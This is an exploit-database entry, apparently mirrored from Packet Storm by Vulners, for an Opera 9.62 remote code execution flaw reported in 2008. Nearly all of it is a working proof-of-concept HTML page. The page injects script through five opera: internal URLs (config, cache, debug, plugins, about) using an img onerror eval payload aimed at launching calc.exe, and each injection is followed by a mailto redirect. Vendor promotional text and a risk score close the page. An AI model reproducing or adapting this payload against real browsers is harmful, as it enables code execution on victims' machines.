Lucene search
K

opera962-exec.txt

🗓️ 31 Oct 2008 00:00:00Reported by NeoCoderzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Opera 9.62 Remote Code Execution, found by NeoCoderz, allows execution of calc.exe

Code
`<!--  
# OPERA 9.62 Remote Code Execution  
# Vulnerability Found By NeoCoderz  
# Email : NeoCoderz1[at]msn[dot]com  
-->  
<html>  
<script>  
function execcalc() {  
var abc="c:\\\\windows\\\\system32\\\\calc.exe";  
window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');  
window.setTimeout("location.href='mailto:'",4000);  
}  
</script>  
<body scrolling="no">  
<a href="#" onclick="execcalc()">Click me...(opera:config)</a><br>  
<script>  
function execcalca() {  
var abc="c:\\\\windows\\\\system32\\\\calc.exe";  
window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');  
window.setTimeout("location.href='mailto:'",4000);  
}  
</script>  
<body scrolling="no">  
<a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br>  
<script>  
function execcalcb() {  
var abc="c:\\\\windows\\\\system32\\\\calc.exe";  
window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');  
window.setTimeout("location.href='mailto:'",4000);  
}  
</script>  
<body scrolling="no">  
<a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br>  
<script>  
function execcalcc() {  
var abc="c:\\\\windows\\\\system32\\\\calc.exe";  
window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');  
window.setTimeout("location.href='mailto:'",4000);  
}  
</script>  
<body scrolling="no">  
<a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br>  
<script>  
function execcalcd() {  
var abc="c:\\\\windows\\\\system32\\\\calc.exe";  
window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');  
window.setTimeout("location.href='mailto:'",4000);  
}  
</script>  
<body scrolling="no">  
<a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br>  
</html>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Oct 2008 00:00Current
7.4High risk
Vulners AI Score7.4
19